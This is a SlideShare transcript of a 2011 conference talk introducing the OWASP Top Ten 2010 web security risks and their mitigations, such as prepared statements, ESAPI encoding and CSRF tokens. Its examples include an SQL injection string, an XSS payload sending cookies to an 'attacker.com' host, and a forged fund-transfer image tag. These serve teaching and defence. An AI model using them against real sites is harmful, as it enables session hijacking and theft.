Is my Web Application secure? OWASP Top Ten Security Risks and Beyond...

4,866 views

Published on

An introduction to Web Application Security issues and approaches - as presentet at http://www.codemotion.it 2011

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
4,866
On SlideShare
0
From Embeds
0
Number of Embeds
940
Actions
Shares
0
Downloads
0
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Is my Web Application secure? OWASP Top Ten Security Risks and Beyond...

  1. 1. Hacking & OS Is my web application secure?OWASP Top Ten Security Risks and beyond Carlo Bonamico carlo.bonamico@nispro.it NIS s.r.l. / JUG Genova http://www.nispro.it / http://juggenova.net Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  2. 2. Is my application secure?  Most likely not... :-(  were used to Java/.NET robustness to buffer overflow with respect to C/C++  but now Rich Internet Applications & AJAX bring new challenges  Injection, XSS, Request Forgery... Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  3. 3. We will talk about... Acknowledgement The Top Ten list Why is (WebApp) Security complex? and several concepts are reproduced under  security beyond buffer overflows OWASPs CC license What about OWASP and Risk-based security approaches? The OWASP Top Ten with focus on  Injection and Cross Site Scripting  Risk Mitigation approaches & tools (Spring Security, ESAPI... ) And beyond...  additional tools and techniques Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  4. 4. What is security From Wikipedia: Protection of Information and Information System  from attacks, misues, intentional and unintentional manipulation, destruction, service disruption 4 guarantees  Integrity  Availability  Confidentiality  Accountability Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  5. 5. Why is security difficult? Intrinsic complexity of  information  tools  systems  processes “false” security perception  risks often difficult to estimate and measure Seen only as a cost, valued only when is missing  did not happen to me Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  6. 6. Consequences Security problems often are not even detected Security is added after-the-fact  increasing costs  limited effectiveness Not part of  development processes  testing processes  standard training Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  7. 7. State of the art Security technologies  constant improvement But main concept is Security as a process  includes human factors, usability issues  includes scale issues Effective Security involves Risk Management  evaluate and compare risks  mitigate when you cannot eliminate Relate security to value Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  8. 8. Web Application Security Specific issues  complexity of network and protocols  power of current Browsers  interaction of heterogeneous sites, often under unrelated management Most websites are almost open  (in)security through obscurity  social engineering attacks are easier Need for specific approaches and tools  Need for defense in depth Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  9. 9. Recommended Books Secrets & Lies  Digital Security in a Networked World by Bruce Schneier  http://www.schneier.com John Wiley & Sons, 2000 Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  10. 10. OWASP The Open Web Application Security Project is an open-source application security organization  includes corporations, educational organizations, and individuals  creates freely-available articles, methodologies, documentation & tools  not affiliated with any company OWASP approaches application security by considering all dimensions  people, process, technology  focus on developers  beyond patching... Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  11. 11. OWASP Projects OWASP Guides  OWASP Tools  Development  WebGoat  Testing  WebScarab penetration testing  Verification proxy WebScarab  ESAPI OWASP Top 10 awareness document  AntiSamy  ... Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  12. 12. And now... OWASP Top Ten for 2010 Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  13. 13. Before we begin: OWASP recommendations... Don’t stop at 10  see OWASP Developers Guide, OWASP Testing Guide, OWASP Code Review Guide  constant stream of new attacks from “the future” Think positive  stop chasing vulnerabilities  focus on establishing strong application security controls  Application Security Verification Standard (ASVS)  use tools wisely Move towards a secure software development life-cycle is used (SDLC) Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  14. 14. Top Ten Security Risks for 2010 A1: Injection  A6: Security Misconfiguration A2: CrossSite Scripting (XSS)  A7: Insecure Cryptographic Storage A3: Broken Authentication and Session  A8: Failure to Restrict URL Access Management  A9: Insufficient Transport Layer A4: Insecure Direct Object References Protection A5: CrossSite Request Forgery (CSRF)  A10: Unvalidated Redirects and Forward  What is it?  a list of the top 10 security Risks on the Web today  risks, not most common weaknesses Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  15. 15. Risk Analysis approach OWASP approach based on standard methodologies  customized for application security  http://www.owasp.org/index.php/Threat_Risk_Modeling Standard model  Risk = Likelihood * Impact factors in "likelihood" and "impact" for application security  how to combine them Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  16. 16. How are the risk evaluated? Threat Agent  Weakness Detectability  application-specific  easy, average, difficult Attack Vector  Technical Impact  easy, average, difficult  severe, moderate, minor Weakness Prevalence  Business Impact  widespread, common,  application-specific uncommon worst case approach Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  17. 17. What is an attack? Attacks are the techniques that agents use to exploit the vulnerabilities in applications  Attacks are often confused with vulnerabilities http://www.owasp.org/index.php/Category:Attack Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  18. 18. What is a vulnerability? A vulnerability is a hole or a weakness in the application  a design flaw or an implementation bug that allows an attacker to cause harm to the stakeholders of an application http://www.owasp.org/index.php/Category:Vulnerability Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  19. 19. What is a control Controls are defensive technologies or modules that are used to detect, deter, or deny attacks Examples  Authentication, Authorization, Auditing  Session Management  Input Validation  Error Handling Cryptography http://www.owasp.org/index.php/Category:Control Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  20. 20. Sources of vulnerabilities Missing control  no encryption of sensitive information  no access control on protected pages Broken control  weak hash algorithm  fail open Ignored Control  control present but not activated Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  21. 21. Impact Analysis Technical impact  on the application, the data it uses, and the functions it provides  loss of Integrity, Availability, Confidentiality, Accountability Business impact  on process, product, service  customer relationship, reputation  law compliance  out-of-business Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  22. 22. What & How to Fix Fix the most severe risks first  does not help to fix the easy or cheap ones if theyre not significant Not all risks are worth fixing  cost of fix vs potential damage As much as possible, re-use existing, sound, tested libraries and components  Spring Security  modular, open, not just for Spring apps  ESAPI  easy to use security controls Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  23. 23. OWASP Enterprise Security API A free, open source, web application security control library  make it easier to write lower-risk applications  make it easy to retrofit security into existing code Language-specific versions  JAVA, .NET, PHP, Ruby... Standard controls + extensible interfaces  ESAPI.encoder(), ESAPI.validator()  ESAPI.encryptor()  ESAPI.authenticator(), ESAPI.accessController()  ESAPI.httpUtilities() Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  24. 24. ESAPI References Introduction to ESAPI  http://www.slideshare.net/denimgroup/enterprise-security-api-esapi-java- java-user-group-san-antonio  http://www.owasp.org/images/c/c7/ESAPI-2010-AppSecDC.pptx ESAPI mapped to the Top Ten  http://www.jtmelton.com/2009/01/03/the-owasp-top-ten-and-esapi/ Samples  http://code.google.com/p/owasp-esapi-java-swingset Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  25. 25. A1 Injection Threat Agents  internal or external actor who can feed untrusted data Attack Vectors  Exploitability: AVERAGE Security Weakness  Prevalence: COMMON / Detectability: AVERAGE Technical Impacts  SEVERE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  26. 26. How it works Attacker sends some special text that is executed by the target interpreter  any source of data is at risk: form fields, uploads, url parameters Wide range of cases, according to the interpreter  SQL executor, LDAP, Xpath, OS commands, URL arguments easy to discover when examining code  more difficult via testing can result in  data loss or corruption, lack of accountability, or denial of access, sometimes complete host takeover Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  27. 27. Example Scenario: SQL Injection Quick and dirty JDBC code  String query = "SELECT * FROM accounts WHERE custID=" + request.getParameter("id") +""; The attacker sends an id parameter  http://example.com/app/accountView?id= or 1=1 View other accounts In the worst case, the attacker uses this weakness to invoke  special stored procedures or DDL queries  allowing a complete db manipulation Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  28. 28. Preventing SQL Injection Never create Statements with string manipulation Always use PreparedStatement or CallableStatement  or a framework based on them (e.g. iBatis / myBatis, Spring JdbcTemplate) With Hibernate/JPA HQL Injection is still possible  always use “by-name” parameters  from EntityName where id=:id Defense in depth  minimal privileges on the DB connection Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  29. 29. Hibernate & JPA Uses PreparedStatements and SQL validation Vulnerable to HQL injection  prefer named parameters  use Criteria queries when programmatically constructing them See also  http://www.owasp.org/index.php/Hibernate  http://www.owasp.org/index.php/Hibernate-Guidelines Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  30. 30. Other platforms .NET  use parameterized APIs with parameter binding  SqlCommand(), OleDbCommand() PHP  use PDO  with strongly typed bindParam() Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  31. 31. Injection references OWASP  http://www.owasp.org/index.php/Top_10_2010-A1  http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet Advanced Topics  http://www.hdm-stuttgart.de/~ms096/SQLInjectionWhitePaper.pdf  http://www.nextgenss.com/papers/advanced_sql_injection.pdf  http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using _SQL_Injection.pdf Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  32. 32. A2 XSS Threat Agents  internal or external actor who can feed untrusted data Attack Vectors  Exploitability: AVERAGE Security Weakness  Prevalence: VERY WIDESPREAD / Detectability: EASY Technical Impacts  MODERATE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  33. 33. How it works Attacker sends special text that sooner or later is delivered to another web browser  and executed... typically as JavaScript  almost any source of data can be an attack vector XSS is the most prevalent web application security flaw  as an example, JSP EL Expressions like ${…} are immediately evaluated and printed to the page “as is”, thus propagating XSS And comes in three flavors  1) Stored, 2) Reflected, 3) DOM based Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  34. 34. Example Scenarios The application dynamically generates an input field without validation or escaping  out.println(“〈input name=creditcard value=" + request.getParameter(“CC”) + "〉”; The attacker modifies the ‘CC’ parameter in their browser to  〉〈script〉document.location= http://www.attacker.com/saveCookie? id=+document.cookie〈/script〉 The victim’s session ID is sent to the attacker  ready for hijacking Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  35. 35. XSS Prevention Untrusted Data of any kind  from any source  HTTP request, URL parameters, form fields, headers, cookies  databases, web services, uploaded files... should always be treated as though it contains an attack  since browser are the worst mix of code and data  many different parsers (XML, HTML, JavaScript, VBScript, CSS, URL, etc...).  sanitized → encoded BEFORE being displayed or forwarded escaping never harms Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  36. 36. OWASP Positive XSS Prevention Model An HTML page like a template with slots where a developer is allowed to put untrusted data  untrusted data is not allowed elsewhere  "whitelist" model  similar to Firefox 4 Content Security Policy Each of the different types of slots has slightly different security rules  attributes, body, urls, links, ... Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  37. 37. ESAPI for Encoding Context-dependent encoding  encodeForSQL  encodeForJavaScript  encodeForXML  encodeForVBScript  encodeForXMLAttribute  encodeForURL  encode forXPath  encodeForDN  canonicalize method to remove  encodeForHTML encodings  encodeForHTMLAttribute  encodeForLDAP <%=ESAPI.encoder().encodeForHTML(name)%> Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  38. 38. References Consider employing Mozilla’s new Content Security Policy  coming out in Firefox 4 Cheat Sheets  http://ha.ckers.org/xss.html  http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_ Cheat_Sheet Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  39. 39. A3 Broken Authentication and Session Management Threat Agents  legitimate users, external, insider Attack Vectors  Exploitability: AVERAGE Security Weakness  Prevalence: COMMON / Detectability: AVERAGE Technical Impacts  SEVERE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  40. 40. Weaknesses Developers frequently build custom authentication and session management schemes  but building these correctly is hard Defects in areas such as  logout, password management, timeouts, remember me, secret question, account update, etc. Admin/special accounts are mostly targeted Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  41. 41. Example Scenario A) Website uses URL rewriting, leaving session ID in clear  http://travel.com/bookFlight;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV? dest=Australia  link is shared in an email  sessionID goes around unencrypted B) Exceptions during login validation are not properly handled  alter the execution path  causing an unauthorized access Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  42. 42. Things to be checked Are credentials always protected when stored  using hashing or encryption? Can credentials be guessed or altered during account management  account creation, change password, recover password? Are session IDs  exposed in the URL (e.g., URL rewriting)?  vulnerable to session fixation?  rotated after successful login? Are passwords, session IDs, and credentials sent only over TLS ? Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  43. 43. Solid Authentication and Session Management Use a single set of strong authentication and session management controls  e.g. Spring Security and/or ESAPI Authenticator Be sure to avoid XSS flaws  can be used to steal session Ids Prevent brute force attacks  limit number of attempts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  44. 44. A4-Insecure Direct Object References Threat Agents  authorized users with partial access to data Attack Vectors  Exploitability: EASY Security Weakness  Prevalence: COMMON / Detectability: EASY Technical Impacts  MODERATE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  45. 45. How it works Attacker changes a parameter value  point to another entity for which he has not access rights Applications often use a business key  easy to guess Applications often do not check access to a URL after the user requests it  (false) security through obscurity Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  46. 46. Example Restrieve account data without verifications  query="SELECT * FROM accts WHERE code=?";  PreparedStatement pstmt = connection.prepareStatement(query , ... );  pstmt.setString( 1, request.getParameter("code"));  ResultSet results = pstmt.executeQuery(); The attacker modifies the ‘code’ parameter  http://example.com/app/accountInfo?acct=notmyacct Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  47. 47. How Do I Prevent Insecure Direct Object References? Use per user or session indirect object references.  instead of the resource’s database key  possibly generated through ESAPI  RandomAccessReferenceMap instance = new RandomAccessReferenceMap();  String indirectKey = instance.addDirectReference((Object)entity ); Check access  propert authorization Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  48. 48. A5-Cross-Site Request Forgery (CSRF) Threat Agents  anyone who can trick your users into submitting a request to your website Attack Vectors  Exploitability: AVERAGE Security Weakness  Prevalence: WIDESPREAD / Detectability: EASY Technical Impacts  MODERATE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  49. 49. How it works Any email or RSS feed or AD creates forged HTTP requests and tricks a victim into submitting them  via image tags, XSS, or numerous other techniques  if the user is logged in, the attack succeeds. Easy when request details are guessable  the browser automatically send cookies to the target server  making difficult to distinguish good requests from bad ones Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  50. 50. Example The application allows a user to submit a state changing request that does not include anything secret. Like so:  http://example.com/app/transferFunds? amount=1500&destinationAccount=4673243243 Attackers hides the link in an img  〈img src="http://example.com/app/transferFunds? amount=1500&destinationAccount=attackersAc ct#“ width="0" height="0" /〉 If the victim browser recently visited and logged into example.com, forged requests will include the user’s session info  inadvertently authorizing the action Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  51. 51. How Do I Prevent CSRF? Include an unpredictable token in each HTTP request  e.g. hidden field, not included in the URL  session cookies, source IP addresses, and other information that is automatically sent doesn’t count since this information is also included in forged requests OWASP’s CSRF Guard  automatically include such tokens in your Java EE, .NET, or PHP application  ESAPI also includes token generators and validators Also check HDIV framework  http://www.hdiv.org/ Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  52. 52. References OWASP Cheat Sheet  http://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  53. 53. A6-Security Misconfiguration Threat Agents  anonymous & internal users wanting more access or to hide their actions Attack Vectors  Exploitability: EASY Security Weakness  Prevalence: COMMON / Detectability: EASY Technical Impacts  MODERATE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  54. 54. How it works Attacker accesses  default accounts  unused pages  unpatched flaws  unprotected files and directories Security misconfiguration can happen at any level of an application stack  including the platform, web server, application server, framework, and custom code Automated scanners are useful Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  55. 55. Administrative Interfaces Are a critical entry point  to application servers, virtualization environments and operating systems Enable them on separate channels Ensure default access credentials are changed Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  56. 56. How Do I Prevent Security Misconfiguration? Use a repeatable hardening process that makes it fast and easy to deploy secured platforms  disabling unnecessary components and services  enabling authentication  changing default credentials  see also devops Setup a process for security updates and patches Use minimal privileges everiwhere Perform scans and audits Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  57. 57. Configuration data review configuration for unsafe defaults  frameworks  application server  web server  db  operating system  virtual machine create a company-wide knowledge base of secure configs and hardening how-to  integrate with open ones, including OWASPs Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  58. 58. A7-Insecure Cryptographic Storage Threat Agents  internal/external users wanting access escalation Attack Vectors  Exploitability: DIFFICULT Security Weakness  Prevalence: UNCOMMON / Detectability: DIFFICULT Technical Impacts  SEVERE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  59. 59. How it works Attackers typically don’t break the crypto  They break something else  e.g. use a keylogger  or access data via channels that automatically decrypt The most common defect is simply not encrypting sensitive data If using crypto, beware of  unsafe key generation and storage  weak algorithms Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  60. 60. How Do I Prevent Insecure Cryptographic Storage? App-specific, but at least:  make sure you encrypt all sensitive data  ensure offsite backups are encrypted, but keys managed separately  use strong standard algorithms and strong keys avoid Do It Yourself  proper key management approaches  encrypted = ESAPI.encryptor().encrypt( decrypted );  decrypted = ESAPI.encryptor() .decrypt( encrypted ); Ensure passwords are hashed and salted Ensure all keys and passwords are protected Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  61. 61. A8-Failure to Restrict URL Access Threat Agents  users wanting to access a private page or privileged page Attack Vectors  Exploitability: EASY Security Weakness  Prevalence: UNCOMMON / Detectability: AVERAGE Technical Impacts  MODERATE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  62. 62. How it works Attacker, who is an authorized system user, simply changes the URL to a privileged page Checks are not present  or Checks are present but not configured correctly  or Links to sensitive pages are hidden  but if direct URL is used they are not protected Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  63. 63. How Do I Prevent Failure to Restrict URL Access? Prefer role-based policies  to minimize the effort required to maintain tThe policies hem Policies should be highly and easily configurable  to minimize hard coded aspects The enforcement mechanism should deny all by default  requiring explicit grants In workflow interactions  check all states Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  64. 64. A9-Insufficient Transport Layer Protection Threat Agents  anyone who can monitor the traffic of your users or backend connections Attack Vectors  Exploitability: DIFFICULT Security Weakness  Prevalence: COMMON / Detectability: EASY Technical Impacts  MODERATE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  65. 65. How it works Monitoring network traffic can be difficult  but is sometimes easy  see wireshark... Applications often use SSL/TLS only during authentication  exposing data and session IDs to interception or only on the front-end  leaving back-end connections to DB or JMS Servers vulnerable Systems use old versions of SSL protocols  subject to many flaws Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  66. 66. How Do I Prevent Insufficient Transport Layer Protection? Require SSL for all sensitive pages  redirected unsecure requests to the SSL page Set the ‘secure’ flag on all sensitive cookies Only support strong (e.g., FIPS 140-2 compliant) algorithms  at least TLS 1.0 SSL 3.0 Ensure your certificate is valid, not expired, not revoked,  and matches all domains used by the site Backend and other connections should also use SSL Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  67. 67. A10-Unvalidated Redirects and Forwards Threat Agents  anyone who can trick your users into submitting a request to your website Attack Vectors  Exploitability: EASY Security Weakness  Prevalence: UNCOMMON / Detectability: EASY Technical Impacts  Impact: MODERATE Business Impacts Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  68. 68. How it works Attacker links to unvalidated redirect and tricks victims into clicking it  http://good.com/fwd?redir=bad.com/virus.exe  properly % encoded... Victims are more likely to click on it, since the link is to a valid site User manipulates parameter to forward to a protected page  http://good.com/forward?path=/WEB-INF/admin.jsp Happens when the redirect/forward url comes from a request parameter Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  69. 69. How Do I Prevent Unvalidated Redirects and Forwards? Simply avoid using redirects and forwards  if used, don’t involve parameters in calculating the destination  else, check destination against valid list (ESAPI supports this)  and verify page authorizations Better yet, use a parameter which is a key and not a full URL  http://good.com/fwd?path=1 Use  HTTPUtilities.sendSafeRedirect()  HTTPUtilities.safeEncodeRedirectURL()  HTTPUtilities.sendSafeForward() Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  70. 70. More... Additional Principles and Tools Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  71. 71. Organizational commitment to security Costs are not the main issue  most of the effort for secure applications also leads to better/more robust/more productive applications Focus and culture are  whats your priority? Commercial aspects  would you sell a wonderful car with no keys? Mostly  training, team effort, specialistic support Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  72. 72. ESAPI Web Application Firewall (WAF) Can be called separately from the other controls Can add to an existing application  Virtual patches  Enforce authentication  Enforce access control  add input validations  add output encodings  Enforce HTTPS  sanitize HTTP headers and cookies Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  73. 73. Pros and Cons Easier and faster to apply patches without coding no subsitute for propert design and implementation mitigation solution See also  http://www.slideshare.net/llamakong/owasp-esapi-waf-appsec-dc-2009 Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  74. 74. Application Layer Logging/Intrusion Detection Really, important!  one of the most important security mechanisms  normally not done ESAPI Intrusion detection Key features  Log Intrusion  Logout User  Disable Account Configurable Thresholds Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  75. 75. AppSensor you report significant events by means of exceptions  invalid credentials  validation exceptions AppSensor  collects them  presents them in a management console  produces alerts according to configurable thresholds  can take actions  lock accounts, disable IP clients Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  76. 76. Proven application security principles Apply defense in depth  Keep security simple Use a positive security model  Detect intrusions  fail-safe defaults, minimize  Don’t trust infrastructure attack surface  Don’t trust services Fail securely Run with least privilege Avoid security by obscurity Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova
  77. 77. Want to know more? My blog  http://www.carlobonamico.com My Company Thank you http://www.nispro.it for your attention! JUG Genova  http://juggenova.net Attend a course  Web Application Security (3 days)  http://www.nispro.it/education/education_focus_sec.html Carlo Bonamico – carlo.bonamico@gmail.com - NIS s.r.l. / JUG Genova

×